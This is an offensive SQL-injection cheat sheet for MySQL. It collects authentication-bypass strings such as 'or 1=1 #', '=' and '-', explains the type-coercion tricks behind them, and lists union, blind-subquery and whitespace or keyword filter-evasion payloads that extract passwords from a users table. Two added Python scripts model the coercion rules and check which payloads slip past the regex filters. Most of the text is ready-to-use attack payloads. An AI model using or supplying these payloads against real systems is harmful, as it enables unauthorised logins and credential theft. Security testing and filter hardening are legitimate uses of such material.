MySQL injection tricks

1 MySQL syntax and authentication bypass
Comment characters:
#
-- X (X must be a whitespace or control character: in MySQL a bare -- is not a comment, which is why the -- - form is so common)
/* (an unterminated comment running to the end of the query; noted on the page for MySQL 5.1)
;%00 (a NUL byte that terminates the statement)

'or 1=1;%00
'or 1=1 union select 1,2

'or 1=1 #
'/*!50000or*/ 1=1 -- - //with server version 5.1.38 this works with any version number no greater than 50138
'/*!or*/ 1=1 -- -
Prefixes:
Any mixture of + - ~ !
'or --+2=- -!!!'2
Testing shows that and/or can be followed by an even number of ! or ~, which can stand in for the space and can also be mixed (mixing changes the rule), and the space before and/or can be omitted. Keep the count in mind: each ! negates its operand, so an odd number of ! flips the truth value, and ~ is bitwise NOT, so only an even number of ~ leaves the value unchanged.
'or- -!!!1=1;
Operators:
^, =, !=, %, /, *, &, &&, |, ||, <, >, <<, >>, >=, <=, <>, <=>, XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...

'or 1 rlike '1

Space replacements: %20, %09, %0a, %0b, %0c, %0d, %a0
Parentheses, prefixes, operators and quotes can also be inserted where a space would otherwise be needed.
'or+(1)sounds/**/like"1"--%a0-

String formats
' or "a"='a'
' or 'a'=n'a' //national character set introducer
' or 'a'=b'1100001' //bit-string literal (0b1100001 = 0x61 = 'a')
' or 'a'=_binary'1100001' //did not work when tested on 5.5.41: _binary is a character-set introducer, so this is the seven-character string '1100001', not a bit string
' or 'a'=x'61' //hexadecimal literal

2、Some handy MySQL building blocks

Constants: true, false, null, \N, current_timestamp...
Variables: @myvar:=1
System variables: @@version, @@datadir...
Common functions: version(), pi(), pow(), char(), substring()...

3、MySQL type conversion

' or 1=true #true=1, false=0
' or 1 #true
' or version()=5.5 #5.5.41-log: when a string is compared with a number, MySQL converts the string using its leading numeric prefix, so '5.5.41-log' becomes 5.5
' or round(pi(),1)+true+true+0.4=version() #3.1+1+1+0.4

A chain of = is evaluated left to right, and a string with no numeric prefix converts to 0 in a numeric comparison, which is how the following condition collapses to true:
select * from users where 'a'='b'='c'
select * from users where ('a'='b')='c'
select * from users where (false)='c'
select * from users where (0)='c'
select * from users where (0)=0
select * from users where true
select * from users

4、Authentication bypass

Bypass string: '='

select data from users where name=''=''
select data from users where false=''
select data from users where 0=0

Bypass string: '-'

select data from users where name=''-''
select data from users where name=0-0
select data from users where 0=0

Both rely on the same conversion rules: = is left-associative, binary - binds tighter than =, and a non-numeric string (including the empty string) is 0 in a numeric comparison.
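To make the coercion rules behind sections 3 and 4 concrete, here is an added Python model of MySQL's comparison semantics (example code written for this page, not MySQL's own implementation and not from the original author). It assumes a simplified conversion rule: in a numeric comparison a string contributes its leading numeric prefix, or 0 if it has none, a comparison yields the integer 1 or 0, and `=` is applied left to right, so `name=''=''` is `(name='')=''`. The helper names (`mysql_eq`, `eval_eq_chain`, the two `where_*` filters) are this example's own.

```python
import re

# Assumption: a simplified model of MySQL's string-to-number coercion.
# MySQL uses the longest numeric prefix of the string ("5.5.41-log" -> 5.5)
# and treats a string without one ("admin", "", "-") as 0, with a warning.
_NUMERIC_PREFIX = re.compile(r"^\s*[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?")


def mysql_str_to_number(s: str) -> float:
    """Return the number MySQL would use when `s` meets a number in a comparison."""
    m = _NUMERIC_PREFIX.match(s)
    return float(m.group(0)) if m else 0.0


def to_num(v) -> float:
    """Coerce a Python value standing in for a MySQL value to a double."""
    if isinstance(v, bool):          # TRUE/FALSE are the integers 1/0
        return float(int(v))
    if isinstance(v, (int, float)):
        return float(v)
    if isinstance(v, str):
        return mysql_str_to_number(v)
    raise TypeError(f"unsupported operand: {v!r}")


def mysql_eq(a, b) -> int:
    """Model of `a = b`: string vs string compares as strings, anything else
    numerically after coercion. Returns 1 or 0, as MySQL does (a comparison
    produces an integer, which is what lets it feed the next `=`)."""
    if isinstance(a, str) and isinstance(b, str):
        return int(a == b)
    return int(to_num(a) == to_num(b))


def eval_eq_chain(*operands) -> int:
    """Evaluate `a = b = c = ...` the way MySQL parses it: ((a = b) = c) = ..."""
    acc = operands[0]
    for rhs in operands[1:]:
        acc = mysql_eq(acc, rhs)
    return acc


def where_name_eq_empty_eq_empty(stored_name: str) -> int:
    """Row filter for `WHERE name=''=''` (the '=' bypass) against one stored name."""
    return eval_eq_chain(stored_name, "", "")


def where_name_eq_empty_minus_empty(stored_name: str) -> int:
    """Row filter for `WHERE name=''-''` (the '-' bypass): binary - binds tighter
    than =, so this is name = ('' - ''), i.e. name = 0."""
    return mysql_eq(stored_name, to_num("") - to_num(""))


if __name__ == "__main__":
    # Constructed sample table: which rows would each bypass return?
    users = ["admin", "alice", "", "123"]
    for name in users:
        print(f"{name!r:8} name=''='' -> {where_name_eq_empty_eq_empty(name)}"
              f"   name=''-'' -> {where_name_eq_empty_minus_empty(name)}")
    print("'a'='b'='c' ->", eval_eq_chain("a", "b", "c"))
    print("version()=5.5 with version()='5.5.41-log' ->", mysql_eq("5.5.41-log", 5.5))
```

Running it shows the two edge cases a practitioner cares about: the '=' form matches every row whose name is a non-numeric string except a row with an empty name (there `name=''` is already 1, and 1='' is false), and the '-' form misses rows whose name starts with a digit, because such a name converts to a non-zero number.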

0x02 Keyword filtering

Space
Filter: /\s/
%20, %09, %0a, %0b, %0c, %0d, %a0
Of these, %a0 is the one that matters: without the /u modifier a PCRE \s only covers ASCII whitespace, so 0xA0 passes the filter while MySQL still reads it as a separator.

Keywords OR, AND
Filter: /\sor\s/i, /\sand\s/i
'||1='1 #or
'='
'&&1='1 #and

Keywords union select
Filter: /union\s+select/i

'and(true)like(false)union(select(pass)from(users))#
'union [all|distinct] select pass from users#
'union%a0select pass from users#
'union/*!select*/pass from users#
/vuln.php?id=1 union/*&sort=*/select pass from users-- -

If union alone is filtered, use blind injection to retrieve the data:

'and(select pass from users limit 1)='secret

Retrieve a single value with a subquery and compare it.
Keyword limit
Filter: /limit/i

'and(select pass from users where id=1)='a
'and(select pass from users group by id having id=1)='a
'and length((select pass from users having substr(pass,1,1)='a'))

Keyword having
Filter: /having/i

'and(select substr(group_concat(pass),1,1)from users)='a

Keywords select ... from
Filter: /SELECT\s+[A-Za-z.]+\s+FROM/i

select [all|distinct] pass from users
select`table_name`from`information_schema` . `tables`
select pass as alias from users
select pass aliasalias from users
select passalias aliasfrom users
select+pass%a0from(users)
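To check which of the payloads in this section actually get past which filter, here is an added Python harness (example code written for this page, not from the original author). It implements the filters listed above as byte-oriented regexes, the way a PHP preg_match without the /u modifier applies them, URL-decodes each payload as the web server would before the filter sees it, and reports the filters that fire. The filter names, the `blocked_by` helper and the payload set are this example's own.

```python
import re
from urllib.parse import unquote_to_bytes

# The filters this section discusses, as PCRE-style patterns. They are compiled
# on bytes so that \s covers only ASCII whitespace [ \t\n\r\f\v], which is what
# PCRE does without /u; that is why 0xA0 (which MySQL still treats as a
# separator) gets through.
FILTERS = {
    "space":        re.compile(rb"\s"),
    "or":           re.compile(rb"\sor\s", re.I),
    "and":          re.compile(rb"\sand\s", re.I),
    "union_select": re.compile(rb"union\s+select", re.I),
    "limit":        re.compile(rb"limit", re.I),
    "having":       re.compile(rb"having", re.I),
    "select_from":  re.compile(rb"SELECT\s+[A-Za-z.]+\s+FROM", re.I),
}


def decode(payload: str) -> bytes:
    """URL-decode as the server does before any filter sees the parameter."""
    return unquote_to_bytes(payload)


def blocked_by(payload: str) -> list[str]:
    """Names of the filters that would reject this payload (empty list = all bypassed)."""
    raw = decode(payload)
    return [name for name, rx in FILTERS.items() if rx.search(raw)]


# Constructed test set: payloads from this page, as they would appear in a request.
PAYLOADS = [
    "' or 1=1 #",
    "'/*!50000or*/ 1=1 -- -",
    "'||1='1",
    "'union select pass from users#",
    "'union%a0select pass from users#",
    "'and(true)like(false)union(select(pass)from(users))#",
    "'and(select pass from users where id=1)='a",
    "select pass as alias from users",
    "select+pass%a0from(users)",
]


def report() -> dict[str, list[str]]:
    """Map each sample payload to the filters that would block it."""
    return {p: blocked_by(p) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, hits in report().items():
        print(f"{payload!r:60} blocked by: {hits or 'nothing'}")
```

The report makes the point that a payload has to be shaped against the whole filter chain, not one rule: 'union%a0select pass from users# defeats /union\s+select/ but is still caught by /\s/ and /SELECT\s+[A-Za-z.]+\s+FROM/, whereas the fully parenthesised form and select+pass%a0from(users) contain no ASCII whitespace at all and trip none of them.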
